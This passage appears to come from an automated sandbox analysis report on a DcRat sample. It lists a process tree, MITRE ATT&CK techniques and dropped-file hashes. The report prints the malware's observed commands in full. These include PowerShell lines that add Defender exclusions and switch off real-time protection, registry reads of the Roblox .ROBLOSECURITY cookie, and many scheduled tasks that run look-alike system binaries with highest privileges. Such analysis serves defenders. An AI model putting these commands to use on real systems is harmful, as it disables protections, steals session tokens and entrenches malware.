    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5016
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:972
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Windows\debug\wtf1.exe"
      4⤵
      Drops file in Windows directory
      Views/modifies file attributes
      PID:1476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\debug\wtf1.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4668
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3936
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:496
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:3844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4300
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:700
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Windows\debug\wtf1.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:4328
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2200
- - C:\Windows\debug\wtf.exe
    "C:\Windows\debug\wtf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4000
- - C:\Windows\debug\cs2.exe
    "C:\Windows\debug\cs2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Templates\SppExtComObj.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Default\Templates\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Templates\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:1752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Program Files\VideoLAN\OfficeClickToRun.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:4976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Program Files\VideoLAN\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Reference Assemblies\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Reference Assemblies\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Uninstall Information\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:4500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows NT\Accessories\ja-JP\unsecapp.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\ja-JP\unsecapp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:1984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows NT\Accessories\ja-JP\unsecapp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Windows\security\templates\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\security\templates\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Windows\security\templates\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:4340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\StartMenuExperienceHost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Windows\de-DE\sihost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\de-DE\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Windows\de-DE\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\lsass.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:4840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\fontdrvhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files\WindowsPowerShell\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files\WindowsPowerShell\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Windows\RemotePackages\RemoteDesktops\lsass.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:3776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1200

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteDesktops\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:1384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\ssh\SearchHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\Users\All Users\ssh\SearchHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\ssh\SearchHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\explorer.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Admin\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Photo Viewer\en-US\RuntimeBroker.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\en-US\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\wininit.exe'" /rl HIGHEST /f
1⤵
PID:2272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\wininit.exe'" /rl HIGHEST /f
1⤵
PID:2232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Google\Update\Offline\SearchHost.exe'" /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\Offline\SearchHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Google\Update\Offline\SearchHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\System.exe'" /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
PID:2288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\WinRAR\RarExtPackage.exe

Filesize
1.5MB

MD5
84d934c68349e798f58a35df1f2f90c2

SHA1
be0974e4699ff06f52f0d5d380bc9cb8f0c50e19

SHA256
3b7218b64c14fc5125a93b4f898886d3bb9c1bb69f0696ae557bb2b79fe8e8f6

SHA512
83ea4479e8536b015a628c0a8ca0662b269875f303bd0193ad551022c04105406001990f3b261c8201ec031d92047450debe1c915a2e361eddb80b48b876d335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DebugTracker.exe.log

Filesize
1KB

MD5
400b532c938aca538f01c5616cf318cd

SHA1
598a59a9434e51a6416f91a4c83bd02505ecb846

SHA256
28e57db6d7535775b5e65c90ab208c7fe392e373056db5d35e76854270ecd05d

SHA512
b15583323c457d389b873eb31b8e59fef450c0c0e684b0f797231e8d0abace9227b15d4e45b45f4c79ad044a28cc3d79f9f7c2a81bd38e43b0c09f07aaa95b73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
711b161528f4959c4b7463036c7324ec

SHA1
53b30cc796c0dfe0cd4c4406202a19139cb5407d

SHA256
7c077fb04d4911778ab648b657b43c9b464393d734dc7fa029ee0f085c6a5638

SHA512
565d0e3e229894de91ad37a16c261bf380e983ffda750f32e8ad361c0606c62043a0188f45d252fecabc6438bc9e7b2c424b101073162ba9633bacd03b42af9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7fe3653d6217fdc6954ab803c0f896e5

SHA1
0b307899fc25595edcda14b94827cce600966056

SHA256
7f12216a666aff5b1fdae54df668fbc5c5abbb8d8ea4d991c4b7af4ab5d313f4

SHA512
c993f37ee9d647a07df622348946f330c8a3acde8258f5fb474a59ff1d539fe75d53f67e3f4a84c38302f549463c77741e8db74d89fb99678d13b25421572e4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Temp\6cf2fb8f-9134-4593-8cac-c946e2e19151.vbs

Filesize
720B

MD5
814877a739a1043fde76d12c4738ca9d

SHA1
b4ad6bd32a465104e2b54be2f584f5040475be83

SHA256
7f46571df5a69eba68c6ab2847242918d4700c7bc23aac88ec9dbd6cd1b5eceb

SHA512
d48846522e7103e76417497c12140559bdaeb638bed4e95943f936345a698c9841d38837c28294dde036997bc138f092347bdf9b9e2fc5f37b7e988e87a4e917

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fagdzaot.dcy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
